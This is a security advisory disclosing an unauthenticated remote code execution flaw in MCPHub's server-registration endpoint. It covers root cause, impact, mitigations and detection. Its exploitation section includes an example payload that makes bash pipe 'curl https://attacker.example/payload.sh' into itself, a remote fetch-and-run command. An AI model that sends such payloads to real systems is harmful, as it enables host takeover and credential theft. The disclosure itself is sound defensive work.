EresusSecurity
Back to Advisories
GHSA-9v37-w4j4-cfp4CriticalCVSS: 10.0

Unauthenticated Remote Code Execution via Arbitrary Command Injection in MCPHub Server Registration

Disclosed: 2026-04-16

Summary

Eresus Security identified a critical remote code execution issue in MCPHub affecting versions <= 0.12.12. The vulnerability exists in the server-registration flow exposed at POST /api/servers. An attacker can supply arbitrary command and args values and have the MCPHub process spawn them as a child process without allowlisting, sandboxing, or validation.

When the vulnerable endpoint is reachable, this issue can lead directly to host-level arbitrary command execution with the privileges of the MCPHub process.

Affected Component

  • Package: mcphub (npm)
  • Affected versions: <= 0.12.12
  • Patched versions: none at the time of publication
  • Advisory: GHSA-9v37-w4j4-cfp4

Root Cause

The issue spans two areas:

  1. src/controllers/serverController.ts
  2. src/services/mcpService.ts

In vulnerable builds, the server-creation handler stores attacker-controlled command and args values and immediately forwards them into a STDIO transport setup. That transport ultimately spawns the process in the context of the MCPHub host, inheriting the surrounding environment and filesystem permissions.

Why This Is Critical

This is not a theoretical injection bug. The server registration flow acts as a direct bridge from JSON configuration to OS-level process creation. In practical terms, an attacker can:

  • execute arbitrary commands;
  • write files to disk;
  • install persistence;
  • exfiltrate API keys, tokens, SSH material, or cloud credentials;
  • pivot into connected infrastructure.

If the host has access to CI/CD, repositories, or production secrets, the blast radius expands from a single service into a supply-chain event.

Exploitation Path

An attacker submits a malicious server definition such as:

  • command: "touch"
  • args: ["/tmp/PWNED_BY_ERESUS.txt"]

or

  • command: "bash"
  • args: ["-c", "curl https://attacker.example/payload.sh | bash"]

Even if the spawned program is not a valid MCP server and the connection later fails, the command has already executed.

Impact

Successful exploitation can enable:

  • full host compromise;
  • credential theft from environment variables and local secret stores;
  • persistence via cron, shell profiles, or system services;
  • ransomware or destructive file modification;
  • cryptomining or bot installation;
  • downstream tampering with source code or deployment artifacts.

Mitigation Guidance

Until a vendor patch exists, organizations should treat this issue as a must-fix architectural risk:

  1. Remove public access to MCPHub administrative endpoints.
  2. Disable or tightly gate server registration until validation exists.
  3. Place MCPHub behind strong authentication and network allowlists.
  4. Run the service in a sandboxed or isolated environment with minimal privileges.
  5. Do not allow arbitrary STDIO server registration from untrusted input.
  6. Rotate secrets stored on hosts that may have been exposed.

Detection Considerations

Review:

  • recent POST /api/servers requests;
  • child process execution logs;
  • suspicious file creation under the service account;
  • new persistence mechanisms or modified shell initialization files.

Any unexpected MCP server definitions containing shell utilities, scripting runtimes, or package managers should be treated as high-signal indicators of compromise.

Credit

Reported by the Eresus Security Research Team.